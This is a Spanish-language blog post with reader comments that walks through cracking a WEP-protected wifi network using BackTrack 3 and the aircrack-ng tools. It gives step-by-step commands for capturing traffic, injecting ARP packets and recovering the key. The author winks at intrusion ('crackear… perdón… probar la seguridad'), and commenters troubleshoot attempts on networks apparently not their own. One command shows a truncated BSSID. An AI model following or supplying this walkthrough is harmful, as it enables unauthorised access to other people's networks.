Bueno… como ya mencione como proteger su wireless, ahora demostraré que la protección WEP es muy mala para evitar intrusos en nuestra RED, mediante su crackeo
Para empezar les digo, como en todos los sitios, blogs y foros que visiten acerca del tema que no me hago responsable por el mal uso que le den al procedimiento… en fin.
…::.-_|°|_-.::…
Este procedimiento es solo para tarjetas ipw2200 o lo que es lo mismo Intel(R) PRO/Wireless 2200BG Network Connection…
…::.-_|°|_-.::…
Bueno pues yo lo hice con BackTrack 3 siguiendo los siguientes pasos:
1. Habilitar la interfaz rtap0 con:
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
Ahora hay que conocer el bssid de la RED a crackear… perdón… probar la seguridad…………. ya que le necesitaremos en el futuro con:
airodump-ng eth1
Paso 1
Y saldrá una lista así:
Lista de paso 1
Ahí toma nota del número MAC del router de la red de tu agrado. –No uses Ctrl + C-
Y para que te quede mas claro utilizaremos como ejemplo la red llamada INFINITUM6329.
Anota el BSSID (que es lo mismo a numero MAC, que es lo mismo a dirección física.) –Ya sabes cultura general- Y al canal (CH) en el que se difunde.
En este caso es:
BSSID
00:21:7C:AC:6D:D9
Canal
3
Adicionalmente marque la parte superior izquierda, que es donde se muestra el canal actual escaneado por tu tarjeta, notarás que cambia rápidamente, así que pon atención en la secuencia en que aparecen los canales pues es estrictamente necesario que detengas dicho escaneo justo en el canal en el que se encuentre la señal de tu interés, en este caso CH 3 –El escaneo se detiene con Ctrl + C-
2. Ahora hay que hacer una conexión “Falsa” con el punto de acseso, obviamente no necesitas conocer la clave real en este momento, así que harás una falsa de diez dígitos… algo como 0123456789
-Cultura general, este paso es requerido debido a las limitaciones que en Intel implementan en sus drivers-
Ahora como el adaptador de red ipw2200 debe estar en modo de “manejo” y conectado al punto de acceso antes de trabajar con aireplay-ng deberás escribir los siguientes comandos:
iwconfig eth1 ap <bssid del punto de acceso> 00:21:7C:AC:6D:D9
iwconfig eth1 key 0123456789
iwconfig eth1 mode managed
Y Dar de alta alas interfaces con:
ifconfig eth1 up
ifconfig rtap0 up
2.1. Opcionalmente puedes escribir iwconfig para verificar que la conexión falsa del paso 2 funciona. Esta viene detallada en la parte de eth1
Conexión Falsa
4. Ejecuta airodump-ng para capturar paquetes provenientes del punto de acceso y guardarlos en un archivo llamado dumpfile*.cap
-Cultura… otra vez, Siempre deberás especificar un canal con airodump, porque de lo contrario, se intentará escanear a través de todos los canales, y esto puede romper tus intenciones de inyección de paquetes al router-
airodump-ng –channel <Access Point channel> –bssid <Access Point bssid> -w dumpfile rtap0
Queda así:
airodump-ng –channel 3 –bssid 00:21:7C:AC:6D:D9 -w dumpfile rtap0
Despues de unos pocos secundos te darás cuenta de que hay clientes conectados al punto de acceso, los cuales están listados en la columna de STATION, aquí toma nota del numero MAC de dicho cliente, en este caso 00:15:00:1C:35:42, pues lo necesitaras en el siguiente paso.
Escaneo del Router
5. Abre otra terminal, y ejecuta un ataque de ARP’s
-Cultura, es por tu bien, jeje, los comandos al final de la línea (“-i rtap0 eth1″) le dicen a aireplay-ng que en la interface rtap0 sea la que escuche la señal y que en eth1 se inyecten los paquetes-
aireplay-ng –arpreplay -b <BSSID del punto de acceso> -h <Numero MAC del cliente obtenido en el paso 4> -irtap0 eth1
Queda así:
aireplay-ng –arpreplay -b 00:21:7C:AC:6D:D9 -h 00:15:00:1C:35:42 -irtap0 eth1
Capturando Paquetes
6. Espera un par de minutos a que el numero ubicado a la izquierda de ARP alcance 100 000, aunque mientras más mejor.
7. Abre otra terminal y ejecuta aircrack-ng.
aircrack-ng -b <BSSID del punto de acceso> dumpfile*.cap
Queda así:
aircrack-ng -b :21:7C:AC:6D:D9 dumpfile*.cap
Así Aircrack te mostrara el tan esperado “Key Found”
Creo que ya sabes que hacer después de eso.
Fin del Crack
Cualquier duda, déjala en comentarios, -PD. No es necesario que dejes tu mail-
15 Comentarios
Una duda… estoy intenta ésto porque se me perdio´mi clave del módem… si aja ni yo me la creí xD.
Tengo la misma tarjeta de red que tu tienes, es la que trae mi lap de fábrica Intel PRO/Wireless 2200BG Network Conectio, siguiendo tu tutorial podría crackear sin problemas?. Es que he leído en otrs sitios que se necesitan tarjetas inalámbricas específicas, que tienen que ser USB. Espero me respondas xD
Así es Zero… se puede, o como crees que me conecte para contestarte…? je je
Cuando andaba buscando la info para aprender a vulnerar la seguridad de un módem, encontré exactamente lo contrario a lo que dices. Es decir, que con las antenas de USB es mas difícil que se pueda, pues a lo que yo entendí son muy simples, y lo que se necesita es que tu antena pueda “inyectar paquetes” en el módem, y para eso hay una lista de compatibilidad de muchas tarjetas de varias marcas donde puedes ver tu ventajas o deficiencias.
Saludos, y cualquier duda aquí estoy.
q onda… estoy en la parte antes de correr el aircrack, inyectando paquetes, la cosa es que ya van 15 min y apenas va en 2600… no existe un comando para acelerar el proceso? de antemano gracias
No olvidaste el final del paso uno?
“Adicionalmente marque la parte superior izquierda, que es donde se muestra el canal actual escaneado por tu tarjeta, notarás que cambia rápidamente, así que pon atención en la secuencia en que aparecen los canales pues es estrictamente necesario que detengas dicho escaneo justo en el canal en el que se encuentre la señal de tu interés, en este caso CH 3 –El escaneo se detiene con Ctrl + C-”
si… lo paro justo en el canalq quiero, en el caso d mi red es el 11
Bajo el supuesto de que seguiste todos los pasos, y lo que obtuviste fue similar a lo que puse en las imágenes, Quizá el router este demasiado lejos, ¿Que tan intensa es la señal?
Ó
En el paso 5
pusiste completo “-irtap0 eth1″
aireplay-ng –arpreplay -b 00:21:7C:AC:6D:D9 -h 00:15:00:1C:35:42 -irtap0 eth1
Incluso tuve que especificar el canal en:
modprobe ipw2200 rtap_iface=1 channel=11
Porque me decía que estaba en el canal 0, y por éso no podía hacer nada…
Algo raro debe de estar pasando… va demasiado lento, manda approx 3000 packets y sólo tengo como 300 ARP’s en 20 min
Aqui en
aireplay-ng –arpreplay -b 00:21:7C:AC:6D:D9 -h 00:15:00:1C:35:42 -irtap0 eth1
tuve que añadirle un guión antes de arpreplay:
aireplay-ng –-arpreplay -b 00:21:7C:AC:6D:D9 -h 00:15:00:1C:35:42 -irtap0 eth1
me marcaba error, yo creo que es porque estoy utilizando el backtrack 4
Pudiera ser que en BT4 la suite de aircrack allá cambiado, pero no creo que tanto como para que los comandos no funcionen, aun así voy a revisarlo y probar con esa versión.
En adición Sr. Zero…
La versión 4 aún es beta quiza por eso causa algún conflicto con las interfaces de rtap y eth
porque con una escucha y con otra inyecta… aunque me voy a bajar el BT4
Y en esta versión es cuando se migra al núcleo de paquetes Debian y repositorios Ubuntu y Actualizaron los drivers de tarjetas wireless
Esto esta bastante bien por que debian y ubuntu hoy día están muy fuertes en el mundo linux, pero el núcleo cambio, y como usuario de ubuntu desde hace un rato te dire que ya intente hacer lo mismo que en BT3 sobre Ubuntu 7.1 hasta el 8.1 sin lograr los resultados deseados… quizá algo cambie en los comandos…
Y acerca de la actualización de drivers, en ocasiones me ha pasado que con una actualización se pierden algunas funciones del hardware… aunque esto es MUY raro que pase.
creo q ya se porque va tan lento, cuando escaneo redes, debajo de la columna de PWR todos los numeros me aparecen negativos, eso es problema de mi tarjeta d red verdad? ojala haya algo para solucionarlo…
ok amigo, entonces me recomiendas usar el bt3? no tenia idea q seguia en beta. Prdon por mis mnsajes tan cortos pero es q estoy usando un psp para co mentar
No hay falla…
Siempre es bueno preguntar.
De cualquier manera seguiré buscando algo para el BT4 aunque si puedes bajate el BT3 pues es la versión estable.
Saludos.
Ohm!
¿Entonces no hay problema con que me salgan en negativo todas bajo la columna PWR?, Incluso la mía que está a 1 metro de distancia me sale negativa…
Quizá sea por la nueva presentación del sistema operativo (Recordar que ya trae núcleo de debian) y solo pone un guion antes del número que indica la potencia de señal… por que no es lógico que si tienes el tuyo a 1 metro te ponga en negativa la columna de power… de hecho ¿como podría poner en negativo el poder? en el caso de no tener alcance solo no la pondría y ya.
También procura escoger una red que tenga más Beacons que es como la cantidad de paquetes que se están enviando, mientras mas sean más rápida sera la inyección.
One Trackback/Pingback
[...] ¿O si? [...]